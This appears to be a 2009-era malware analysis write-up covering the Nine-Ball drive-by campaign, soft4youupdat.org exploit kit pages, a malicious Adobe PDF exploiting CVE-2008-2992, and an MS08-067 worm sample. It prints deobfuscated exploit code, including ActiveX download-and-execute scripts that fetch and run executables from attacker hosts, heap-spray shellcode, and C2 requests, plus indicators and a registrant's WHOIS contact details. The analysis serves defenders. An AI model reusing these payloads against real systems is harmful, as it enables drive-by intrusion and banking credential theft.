Nine-Ball Analysis

On 16 June 2009, Websense released an Alert concerning the latest drive-by web exploit dubbed Nine-Ball. Per Websense, “We have been tracking the Nine-Ball mass compromise since 6/03/2009. To date, over 40,000 legitimate Web sites have been compromised with obfuscated code that leads to a multi-level redirection attack, ending in a series of drive-by exploits that if successful install a trojan downloader on the user's machine.” The name Nine-Ball came from the final landing exploit site destination after a series of redirects:

rnw.kz > bro.tw > rmi.tw > ninetoraq.in

Further investigation reveals there are numerous landing exploit sites which dynamically change each time a victim host is redirected. Multiple connections from the same source IP address result in a redirect to the benign site ask.com. The exploit code on the landing site also appears to vary with each site.

The following is sample redirect/exploit path followed from the base redirect rnw.kz/index.php

Exploit Analysis

http://rnw.kz/index.php
|-->HTTP 302 location redirect to http://bro.tw/in.cgi?3
|---->meta http-equiv refresh redirect to http://rmi.tw/in.cgi?6
|------> HTTP 302 location and meta http-equiv refresh redirect to http://mias.tw/1/index.php

All of the sites are hosted at 91.212.65.133 (Eurohost LLC, AS48841, Ukraine)

The sites bro.tw and rmi.tw appear to utilize cookies to track visitor requests. Multiple requests result in a redirect to the landing site http://ask.com.

The site http://mias.tw/1/index.php returns obfuscated JavaScript that decodes to reveal an EMBED tag that references pdf.php.

function FVEopW91F0QKb(){
var Qqz8W8MiQQlAc = false;
try {
if (navigator.plugins && navigator.mimeTypes.length){
for (var apjVVQ1jEqGNq = 0; apjVVQ1jEqGNq < navigator.plugins.length; apjVVQ1jEqGNq
++ ){
var iWHp9Og8VDFsw = navigator.plugins[apjVVQ1jEqGNq].name;
if (iWHp9Og8VDFsw.indexOf("Adobe Acrobat") != - 1){
Qqz8W8MiQQlAc = true;
break ;
}
}
}
}
catch (e){
}
if (Qqz8W8MiQQlAc){
document.write(
'<EMBED SRC="pdf.php" WIDTH="36" HEIGHT="14" TYPE="application/pdf" /></EMBED>');
}
else return false;
}
setTimeout("FVEopW91F0QKb();", 500);

The file pdf.php request returned a PDF file named What_is_Unique_Pack.pdf. The filename refers to the unique Pack exploit toolkit discussed by Finjan.

File: What_is_Unique_Pack.pdf
Size: 15139
MD5: 2C8144C3927A33598FEBFFBFC61B6EA9

The PDF file meta data indicates it was created June 6, 2009 using Nitro PDF Professional 6.0 and print driver BCL easyPDF 6.00.20.

/Creator (NitroPDF 6.0)
/Producer (BCL easyPDF 6.00.20)
/ModDate (D:20090606123256+02'00')
/CreationDate (D:20090606123026+03'00')

The PDF contains obfuscated JavaScript that decodes to reveal 3 exploits targeted against Adobe Reader vulnerabilities.

• Adobe util.printf overflow vulnerability (CVE-2008-2992, APSB08-19)
• Collab.collectEmailInfo()JavaScript Method Remote Code Execution Vulnerability (CVE-2007-5659, APSB08-13)
• Collab.getIcon() JavaScript Method Remote Code Execution Vulnerability (CVE-2009-0927, APSB09-04)

All of the exploits result in the GET request for http://mias.tw/1/getexe.php downloaded as load.exe.

Malware Analysis

The malware load.exe creates mscorewr.dll, which Microsoft detects as Win32/Silentbanker.B. As of 2009.06.20 02:30:08 (UTC) only 2/41 antivirus vendors detect the malware.

ThreatExpert
VirusTotal

File: load.exe
Size: 69632
MD5: 801EFE85BEF379E50B882F7B5846DB7A

The malware load.exe creates the following file and registry entries.

c:\WINDOWS\system32\mscorewr.dll

File: mscorewr.dll
Size: 86016
MD5: 33C03C3768610765A06CB112CABAA00A

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000} "(Default)"
Type: REG_SZ
Data: mscorewr
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\System32\mscorewr.dll
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\InprocServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_CLASSES_ROOT\CLSID\{00009E9F-DDD7-AA59-AA7D-AA4B7D6BE000}\TypeLib "(Default)"
Type: REG_SZ
Data:

Domain/IP Analysis

The 3 initial redirect domains rnw.kz, bro.tw, and rmi.tw resolve to 91.212.65.133 (Eurohost LLC, AS48841, Ukraine). The following domains also currently resolve to 91.212.65.133.

bmt.tw
bro.tw
mail.bro.tw
mail.nikodomain.info
molo.tw
nikodomain.info
ns1.dmdnssrv.info
orep.tw
rmi.tw
rnw.kz
sovi.tw
mias.tw

The below table lists domain registration data for the domains hosted at 91.212.65.133:

Domain Registration Provider Registration Date Registrant Country
mias.tw WebCC Ltd. 2009-06-15 RU
bmt.tw WebCC Ltd. 2009-05-17 RU
bro.tw WebCC Ltd. 2009-06-03 RU
molo.tw WebCC Ltd. 2009-06-09 RU
orep.tw WebCC Ltd. 2009-06-15 RU
rmi.tw WebCC Ltd. 2009-06-12 RU
sovi.tw WebCC Ltd. 2009-06-12 RU
rnw.kz SKILLTEX 2009-05-18 RU

Redirect testing identified the exploit landing site rotated between several sites. The following sites were observed in addition to the aforementioned http://mias.tw/1/index.php. Each of the exploit landing sites used different obfuscation techniques, exploits and payload downloads.

http://my-bilderrahmen.cn/e/t.php (85.17.200.207, NL)
http://adultfex.com/lb/index.php (209.160.72.174, US)
http://www.1w90.co.cc/1/index.php (213.182.197.251, LV)
http://pendu1um.cn/cp/index.php (61.235.117.85, CN)
http://orep.tw/pve/ (91.212.65.133, RU)
http://stopssse.info/l.php?pbr (66.199.237.127, US)

On 22 June 2009, ScanSafe called out Websense's reporting numbers and stated Nine-Ball was a bunch of hype. Let the firewoks begin...

soft4youupdat.org Exploit Analysis

The analysis of exploit code hosted at soft4youupdat.org results in the typical TTP that includes malicious obfuscated JavaScript, browser-based IE exploits, banking credential stealing malware and ISPs with dubious reputations. The story follows...

A request for http://soft4youupdat.org/counts/index.php returns 3 sections of obfuscated exploit code and an iframe for hxxp://soft4youupdat(dot)org.

(1)
<script>opdYzUDi=document.location.href;if(opdYzUDi.indexOf('http://')!=-1){eval('Tgwm\x61Tgwm\x7aTgwm…….truncated…….\x7bTgwm\x7dTgwm\x7d'.replace(/Tgwm/g, ''));}</script>

(2)
<script>ftXokBk6=document.location.href;if(ftXokBk6.indexOf('http://')!=-1){eval('qyT\x66qyT\x75qyT…….truncated…….\x7bqyT\x7dqyT\x7d'.replace(/qyT/g, ''));}</script>

(3)
<html><iframe src="hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf" widht="1" height="1"></iframe></html>

(4)
<script>hu7AMj=document.location.href;if(hu7AMj.indexOf('http://')!=-1){eval('MZnVp\x76MZnVp\x61MZnVp…….truncated…….\x28MZnVp\x29MZnVp\x3b'.replace(/MZnVp/g, ''));}</script>

The JavaScript replace() Method is used to obfuscate the exploit code. The replace() Method syntax is

stringObject.replace(findstring,newstring)

A 'g' flag is used to perform a global search and an 'i' flag is used to perform a case-insensitive search.

Exploit Block 1
The first block of exploit code globally replaces the characters Tgwm with the empty string ". The decoded section returns a string of escaped hexadecimal characters.

eval('\x61\x7a\x20\x3d\x20\x6e\x65\x77\x20\x41\x72\x72\x61\x79\x28\x29\x3b\x61\x7a\x2e\x70\x75\x73\x68\x28\x27\x68\x5e\x74\x26\x74\x70\x29…….truncated…….\x7b\x7d\x7d')

The hexadecimal character string decodes to reveal additional code that again uses the JavaScript replace() Method for obfuscation. The script decodes to reveal MDAC RDS.Dataspace ActiveX Control Vulnerability (CVE-2006-0003, MS06-014) exploit code. The payload is a GET request for hxxp://soft4youupdat(dot)org/counts/bin/default.exe.

az = new Array();az.push('h^t&tp)&://#$s$o#)ft4!yo*uup!da)t.)or*g!$/c((ou*n@ts!/)b#i%$n!/!@def!a^&u(l*t.exe#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));for(i = 0; i <= az.length - 1; i++){ start(az[i], '.%/$/*@..^#/)@/f)i#(le#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + i + '.(e(^x^e!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));}function start(sUrl, sPath) { var z = document.createElement('o&b!j))e*ct!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));z.setAttribute('id'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'z'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); z.setAttribute('clas@s!!i$!d@$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'cl%(s&id:)B*D^9%6#C(5*^56&-^*65A3$-^11(D!(0-98*3A%-0#0(C%(0^4@FC@2(9(&E36$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try { var q = z.CreateObject('m&s!(xm@l%2.^&X&@M*LH@@T%T%*P'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); var s = z.CreateObject('Sh$@el#l).A%)p(pli&c$^a$t((ion'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));var t = z.CreateObject('a@do%db^).$#s$)t%(r!eam'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); try { t.type = 1; q.open('GE!T'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), sUrl, false);q.send(); t.open(); t.write(q.responseBody); t.savetofile(sPath,2); t.close();} catch(e) {}try { s.shellexecute(sPath); if(shellexecute=true) { var b = new ActiveXObject('M)icros@#oft*&.X)$M^L&!H%&T&TP!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));b.open('G!ET#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'l*$o%!ad).php^#?)m@dc='.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + Math.random()); b.send(null); }} catch(e){}} catch(e){}}

Exploit Block 2
The second block of exploit code uses the same obfuscation technique decoding to reveal Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041) exploit code. The payload is hxxp://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random().

function killErrors() { return true; } window.onerror = killErrors; var x; var obj;var myarr = new Array(); myarr[0] = 'c:\\Program Files\\Outlook Express\\wab.exe';myarr[1] = 'd:\\Program Files\\Outlook Express\\wab.exe';myarr[2] = 'e:\\Program Files\\Outlook Express\\wab.exe';setTimeout('window.location = "ldap://127.0.0.1"', 5000);for (x in myarr){obj = new ActiveXObject('snpv$w@.S$*n%(a&ps&h%)o$t!$ Vi)ew&e&$r)# Co$n&t(ro$l.*%1$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try{var buf1 = 'http://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random();var buf2 = myarr[x]; obj.Zoom = 0;obj.SnapshotPath = buf1; obj.CompressedPath = buf2; obj.PrintSnapshot();}catch(e){}}

Exploit Block 3
The third block of exploit code included an iframe for hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf. The PDF contained buffer overflow exploit code targeted against a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader’s JavaScript Engine (CVE-2007-5659, APSB08-13). The PDF metadata indicates it was created with Scribus 1.3.3.12 which provides desktop publishing for Linux/Unix. Scribus provides a step by step guide for beginning to enhance PDF with JavaScript. The creation date is 8-6-08.

13 0 obj
<>
Stream

[filter FlateDecode has been applied to the JavaScript bitstream]

endstream
endobj
12 0 obj
<>
endobj
14 0 obj
<<>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
Endobj

The tool Pdftk - the PDF Toolkit can be used to inflate the FlateDecode JavaScript. The tool syntax is:

pdftk input.pdf output output.pdf uncompress

The exploit shellcode payload is a GET request for hxxp://soft4youupdat(dot)org/counts/load.php?pdf=35f4a8d465e6e1edc05f3d8ab658c551.

function rvcfcd208495d565e()
{
var rvc4ca4238a0b9238 = new Array();

function rvc81e728d9d4c2f6(rveccbc87e4b5ce2f, rva87ff679a2f3e71)
{
while (rveccbc87e4b5ce2f.length * 2 < rveccbc87e4b5ce2f =" rveccbc87e4b5ce2f.substring(0," rv1679091c5a880fa =" 0x0c0c0c0c;" rv8f14e45fceea167 =" unescape(" rvc9f0f895fb98ab9 =" 0x400000;" rv45c48cce2e2d7fb =" rv8f14e45fceea167.length" rva87ff679a2f3e71 =" rvc9f0f895fb98ab9" rveccbc87e4b5ce2f =" unescape(" rveccbc87e4b5ce2f =" rvc81e728d9d4c2f6(rveccbc87e4b5ce2f," rvd3d9446802a4425 =" (rv1679091c5a880fa" rv6512bd43d9caa6e =" 0;" rvc51ce410c124a10 =" app.viewerVersion.toString();" rvc51ce410c124a10 =" rvc51ce410c124a10.replace(/\D/g," rvaab3238922bcc25 =" new" rv9bf31c7ff062936 =" unescape(" collabstore =" Collab.collectEmailInfo({subj:">

Exploit Block 4
The fourth block of exploit code uses the same obfuscation technique decoding to reveal 3 buffer overflow exploits:

• COM Object Instantiation Memory Corruption Vulnerability (CVE-2005-2127, MS05-052)
• Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow - CVE-2007-0018
• Microsoft Visual Studio 'Msmask32.ocx' ActiveX Control Remote Buffer Overflow Vulnerability (MS08-070)

The shellcode payload for all 3 exploits is hxxp://soft4youupdat(dot)org/counts/load.php?bof=3c59dc048e8850243be8079a5c74d079.

var Shellcode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u732F%u666F%u3474%u6F79%u7575%u6470%u7461%u6F2E%u6772%u632F%u756F%u746E%u2F73%u6F6C%u6461%u702E%u7068%u623F%u666F%u333D%u3563%u6439%u3063%u3834%u3865%u3538%u3230%u3334%u6562%u3038%u3937%u3561%u3763%u6434%u3730%u0039");function geSpyrrSlirrdep(sssprassydddbSliiide, saruuysaddize){while (sssprassydddbSliiide.length * 2 < sssprassydddbsliiide =" sssprassydddbSliiide.substring(0," hpsdyytttscess =" 0x0c0c0c0c;var" hadttdtsize =" 0x400000;var" payfdlytyusade =" Shellcode.length" tggter =" payfdLytyusade" saruuysaddize =" hadttdtSize" sssprassydddbsliiide =" unescape(" prrerat =" new" sssprassydddbsliiide =" geSpyrrSlirrdep(sssprassydddbSliiide," kilrrer =" hpsdyytttscess" hsttiicks =" kilrrer" i =" 0;" ugric =" unescape(" xyz =" 0x40000;while(ugric.length" ugric =" ugric.substring(0," bublic =" new" i =" bublic;">');zorro = Math.ceil(0xd0d0d0d);zorro = document.scripts[0].createControlRange().length;}catch(e) {}setTimeout("startAudioFile()", 2000);}function startAudioFile(){try{var mmed = document.createElement("object");mmed.setAttribute("classid", "clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC");var mms="";for(var i=0; i < body =" '';var buf1 = '';for (i = 1; i <= 1945; i++){buf1 = buf1 + unescape(" href="http://google.com/">

Malware Analysis
The payload for all of the soft4youupdat(dot)org exploits is the same binary file.

Filename: bin_default.exe/default.exe
MD5: d9b7bf5b02fa9d1fc9da041916ff0a5e
Size: 59,392 bytes

The malware is a Zbot trojan which steals online banking information and downloads additional malware.

The following files are created:

%System%\ntos.exe
0xB01F2D6531F9EC917E8996ED5962DB48
308,736 bytes

%System%\wsnpoem\audio.dll
%System%\wsnpoem\video.dll

The following registry key is created to launch the malware at startup:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] Userinit = "%System%\userinit.exe,%System%\ntos.exe,"

Virus total indicates a low detection rate for this particular variant at the time of analysis [Result: 9/38 (23.68%)]

Domain Analysis
The domain soft4youupdat.org was registered 11-20-08 at Everyones Internet, Ltd.

Domain ID:D154732571-LROR Domain
Name:SOFT4YOUUPDAT.ORG
Created On:20-Nov-2008 12:59:45 UTC
Last Updated On:20-Nov-2008 13:19:16 UTC
Expiration Date:20-Nov-2009 12:59:45 UTC
Sponsoring Registrar:Everyones Internet, Ltd. (R1381-LROR)
Status:TRANSFER PROHIBITED
Registrant ID:tul8MyjB2Dv7rqIF
Registrant Name:Vladimir Mashkov
Registrant Organization:N/A
Registrant Street1:st. Lenin's 56 square 43
Registrant Street2:
Registrant Street3:
Registrant City:Moscow
Registrant State/Province:Moscow
Registrant Postal Code:10010
Registrant Country:RU
Registrant Phone:+7.4950784576
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email: mailto:andrea12a@inbox.ru

The domain soft4youupdat.org currently resolves to 67.228.139.26 which is registered to the Plano, TX company SOFTLAYER Technologies Inc. (ASN AS36351, 67.228.128.0/18).

aut-num: AS36351
as-name: SOFTLAYER
descr: SoftLayer Technologies Inc.
import: from AS-ANY accept ANY AND NOT {0.0.0.0/0}
export: to AS-ANY announce AS36351
admin-c: IPADM258-ARIN
tech-c: IPADM258-ARIN
notify: noc@softlayer.com
mnt-by: MAINT-AS36351
changed: ipadmin@softlayer.com 20060110
source: RADB

SOFTLAYER Technologies Inc leased IP space to Innovation IT Solutions Corp which is an international communications company headquartered in London, UK.

Innovation IT Solutions Corp. NET-67-228-139-0 (NET-67-228-139-0-1)
67.228.139.0 - 67.228.139.127



SOFTLAYER Technologies Inc is listed by StopBadware.org in their top 10 worst network block owners and the McColo Cyber Crime USA – V2.0 report lists the ISP in the top 5 worst network block owners. Both IT Solutions Corp and SOFTLAYER Technologies Inc have been previously tied to RBN activity and the Russian Cyberwar on Georgia.

CVE-2008-2992 Adobe PDF Exploitation

On 7 November 2008, SANS reported an active exploit against the Adobe Reader and Acrobat util.printf() JavaScript function stack buffer overflow vulnerability (CVE-2008-2992). Adobe Reader and Acrobat contain a stack buffer overflow in the util.printf() JavaScript function, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system. The vulnerability was first reported by CORE Security technologies in May 2008. Adobe released Adobe Reader and Adobe Acrobat 8.1.3 on 4 November 2008 to address the vulnerability (APSB08-19). Public exploit code was reported on 7 November 2008. The following analyzes a malicious PDF sample.

Exploit Analysis:

The site infonews.ath.cx hosted the malicious PDF file data.pdf (hxxp://infonews.ath.cx/data.pdf). The domain ath.cx is controlled by five name servers at dyndns.org. Dynamic DNS (DDNS) allows individuals to create a hostname that points to his/her dynamic IP or static IP address or URL. DynDNS also provides an update mechanism which makes the hostname work with a dynamic IP address.

ns1.dyndns.org 63.208.196.90
ns2.dyndns.org 204.13.249.75
ns3.dyndns.org 208.78.69.75
ns4.dyndns.org 91.198.22.75
ns5.dyndns.org 203.62.195.75

At the time of exploit, infonews.ath.cx resolved to 85.17.162.100 located in the Netherlands.

inetnum: 85.17.162.0 - 85.17.162.255
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
descr: www.leaseweb.com
remarks: Please send email to mailto:"abuse@leaseweb.com" for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
status: ASSIGNED PA
mnt-by: OCOM-MNT
source: RIPE # Filtered

The IP 85.17.162.100 currently maps to 19 domains.

*.adrefer.net
*.adxdnet.net
*.kasdfps.net
ad.adrefer.net
adrefer.net
adxcnet.net
adxdnet.net
awltovhc.net
espads.net
especialads.com
ikwlkad.net
infonews.ath.cx
iwdjiamk.net
kasdfps.net
kiafjwo.net
netcrefer.net
ssa.adxdnet.net
tqlkg.net
www.kasdfps.net

data.pdf
84bc91579cd4dbee7faf3ee09c4a9a4b
10179

The malicious PDF file includes objects that contain document-level JavaScript.

00000581 00000581 0 24 0 obj
0000058A 0000058A 0 <</JavaScript 25 0 R>>
000005A1 000005A1 0 endobj
000005A8 000005A8 0 25 0 obj
000005B1 000005B1 0 <</Names[(main)26 0 R]>>
000005CA 000005CA 0 endobj
000005D1 000005D1 0 26 0 obj
000005DA 000005DA 0 <</S/JavaScript/JS 27 0 R>>
000005F6 000005F6 0 endobj
000005FD 000005FD 0 27 0 obj
00000606 00000606 0 <</Length 1257/Filter[/FlateDecode]>>stream
00000636 00000636 0 W[k+7
00000667 00000667 0 Ms(l6
00000799 00000799 0 Gs~tx
0000086E 0000086E 0 8U7n
0000091B 0000091B 0 l+Vi5
0000096B 0000096B 0 o :[hx
00000B1E 00000B1E 0 endstream
00000B28 00000B28 0 endobj
00000B2F 00000B2F 0 28 0 obj



The inflated PDF FlateDecode streams reveal obfuscated JavaScript which further decodes to reveal shellcode.

var sccs = unescape(""+"%"+"u03eb%u"+"eb59%ue805%uf"+"ff8%uffff%u4949%u4949%u494"+"9%u4937
%u4949%u4949%u4949%u4949%u4949%u5a51%u656a%u5058%u4230%u4231%u6b41%u4141%u4175%u4132%u3241
%u4142%u4230%u5841%u4138%u5042%u4d75%u7939%u4d6c%u5038%u4344%u4530%u3550%u4c50%u714b%u5555
%u4c6c%u414b%u736c%u4135%u6368%u6a31%u6c4f%u524b%u766f%u6c78%u414b%u674f%u6450%u6841%u726b
%u6e69%u546b%u6c74%u374b%u5871%u706e%u6b31%u6e70%u4e79%u4b4c%u3934%u7350%u5744%u6f77%u6931
%u565a%u776d%u6871%u3842%u396b%u4564%u416b%u4444%u6364%u5434%u4935%u6e75%u636b%u416f%u3534
%u7a51%u514b%u6e76%u346b%u304c%u6e4b%u416b%u754f%u354c%u6a51%u6e4b%u476b%u6e6c%u436b%u7a31
%u4c4b%u7349%u516c%u5634%u4b64%u3073%u4f31%u5230%u4e44%u736b%u4470%u4c70%u5945%u4150%u3468
%u4c4c%u634b%u4670%u4c6c%u524b%u5750%u6e6c%u6c4d%u504b%u3768%u6a78%u574b%u6c79%u6b4b%u4e30
%u7750%u7770%u4370%u6c30%u754b%u5738%u614c%u544f%u7871%u5376%u5650%u6c36%u7949%u4e68%u6b63
%u5170%u566b%u3230%u6c48%u4d30%u675a%u4374%u356f%u4f38%u7968%u4d6e%u765a%u706e%u4b57%u4d4f
%u7237%u344d%u7333%u5258%u5054%u5761%u4150%u7278%u6354%u4244%u6450%u767a%u364f%u624f%u5341
%u3154%u4368%u7054%u316e%u3175%u7464%u326e%u524e%u7345%u6444%u426f%u7043%u706f%u3564%u3435
%u516f%u3263%u4352%u7045%u646e%u346e%u3530%u5438%u7530%u6550");

var bgbl = unescape("%u0A0A"+"%u0A0A");
var slspc = 20 + sccs.length;
while(bgbl.length < fblk =" bgbl.substring(0,slspc);" blk =" bgbl.substring(0,bgbl.length" blk =" blk" mmy =" new" i =" 0;" nm =" 12;" i =" 0;" nm =" nm" i =" 0;" nm =" nm">

The shellcode execution results in a GET request for hxxp://adxdnet.net/code/srun.php. The domain adxdnet.net is hosted at 85.17.162.100 (same IP as infonews.ath.cx).

The adxdnet.net/code/srun.php request returns obfuscated JavaScript. The image reference for hxxp://fc.webmasterpro.de/as_noscript.php?name=load3 is for tracking purposes.

The decoded script reveals a redirect to adxdnet.net/code/srun.php?req

var xobj, response;
if(window.XMLHttpRequest) { try{ xobj = new XMLHttpRequest(); }catch(e){} }
if(!xobj) { try{ xobj = new ActiveXObject("Microsoft.XMLHTTP"); }catch(e){} }

if(xobj) {
xobj.open("GET", "/code/srun.php?req", false);
xobj.setRequestHeader("Request", "srun");
xobj.send(null);
response = xobj.responseText;
}

if(response.length) {
dec(asas(response), "s", 2);
} else {
self.moveTo(3000, 3000);
self.opener = "opener";
self.close();
}

The adxdnet.net/code/srun.php?req request returns content for additional binary downloads.

GET /code/srun.php?req HTTP/1.1
request: srun
Referer: http://adxdnet.net/code/srun.php
Host: adxdnet.net

Six minutes later, a GET request for ssa.adxdnet.net/get.php?src=xpre occurred. Additional hex-encoded binaries were downloaded over an 8 minute period. Notice the user-agent (WinHttp.WinHttpRequest.5) and Request value: srun.

GET /get.php?src=xpre HTTP/1.1
Request: srun
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32;WinHttp.WinHttpRequest.5)
Host: ssa.adxdnet.net

hxxp://ssa.adxdnet.net/get.php?src=xpre
hxxp://ssa.adxdnet.net/get.php?src=prun
hxxp://ssa.adxdnet.net/get.php?src=wavvsnet
hxxp://ssa.adxdnet.net/get.php?src=snapsnet
hxxp://ssa.adxdnet.net/get.php?src=rasesnet
hxxp://ssa.adxdnet.net/get.php?src=searsnet
hxxp://ssa.adxdnet.net/get.php?src=incasnet
hxxp://ssa.adxdnet.net/get.php?src=winvsnet

The following is an additional request that lacked the WinHttp.WinHttpRequest.5 user-agent.

GET /code/const.php HTTP/1.1
Host: ssa.adxdnet.net

The downloaded malware installs a variety of crapware (rogue security products, adware, etc.)

Filename MD5 Size (Bytes)
data.pdf 84bc91579cd4dbee7faf3ee09c4a9a4b 10179
prun.exe d7512e025c439d8454a742992229770c 34816
rasesnet.exe 423d4daf5374710d4498ed917f44b92a 135168
searsnet.exe 18bd892d291f21f14e660537112bb81c 65024
snapsnet.exe 637146739c0dc4c078e0654e6d77eda1 112378
wavvsnet.exe 602b54e018fe9b226ebf8fd5ebaff09c 40014
winvsnet.exe 279ce5af3638a2ba1fde073bbe73a0c5 54784
xpre.exe 1d032fbc6d6884903fa92889f99fc180 745472

MS08-067 and W32.Wecorl

On 2 November 2008, Symantec reported a “worm” called W32.Wercol that attempted to exploit the Microsoft Windows Server Service RPC Handling Remote Code Execution Vulnerability (MS08-067). The following provides analysis for the W32.Wercol malware variant 10wrjcenew.exe.

In a lab test, the malware 10wrjcenew.exe:

Created C:\DOCUME~1\%user profile%\LOCALS~1\Temp\Install.2008.dat
Deleted C:\WINDOWS\System32\Dllcache\Svchost.exe
Modified C:\WINDOWS\System32\Svchost.exe
Created C:\WINDOWS\system32\7DBF6DA4

The following registry keys were created:

HKEY_LOCAL_MACHINE\SOFTWARE\Google "[MAC ADDRESS]"
Type: REG_BINARY
Data: (data too large: 3584 bytes)
HKEY_LOCAL_MACHINE\SOFTWARE\Licenses "[MAC ADDRESS]"
Type: REG_BINARY
Data: [HEXADECIMAL DATA]

The malware proceeded to download mimi.1268772 from ls.cc86.info (121.12.172.44, CN) and pp.gif from blog-imgs-27.fc2.com (208.71.107.52, US)

GET /mimi.1268772 HTTP/1.1
Host: ls.cc86.info

GET /u/f/o/ufo2000sgd/pp.gif HTTP/1.1
Host: blog-imgs-27.fc2.com

The malware attempted a MS08-067 buffer overflow exploit against 121.x.x.x UDP port 137

0000 00 0f 66 5e 0e 78 00 0c 29 ec 1c 43 08 00 45 00 ..f^.x..)..C..E.
0010 00 4e 01 02 00 00 80 11 53 af c0 a8 00 0d 79 0c .N......S.....y.
0020 ac 2c 00 89 00 89 00 3a 5a 2d 80 13 00 00 00 01 .,.....:Z-......
0030 00 00 00 00 00 00 20 43 4b 41 41 41 41 41 41 41 ...... CKAAAAAAA
0040 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0050 41 41 41 41 41 41 41 00 00 21 00 01 AAAAAAA..!..

The malware connects to ce.10wrj.com (218.95.101.68, CN) ClientReg.aspx and ClientTask.aspx to register the malware and receive C2 instructions. The sample connection shows a download request for ce.10wrj.com/nb1103.exe.

GET /ClientReg.aspx?mac=xx:xx:xx:xx:xx:xx&Type=0&Sn=081026 HTTP/1.1
Host: ce.10wrj.com

HTTP/1.1 200 OK

xxyysign xxyyMyIP=xx.xx.xx.xx



GET /ClientTask.aspx?mac= xx:xx:xx:xx:xx:xx &Type=0&Sn=081026 HTTP/1.1
Host: ce.10wrj.com

HTTP/1.1 200 OK

xxyysign
xxyyUserNamePassWord=CeUser:CePassWord
xxyyPort=0
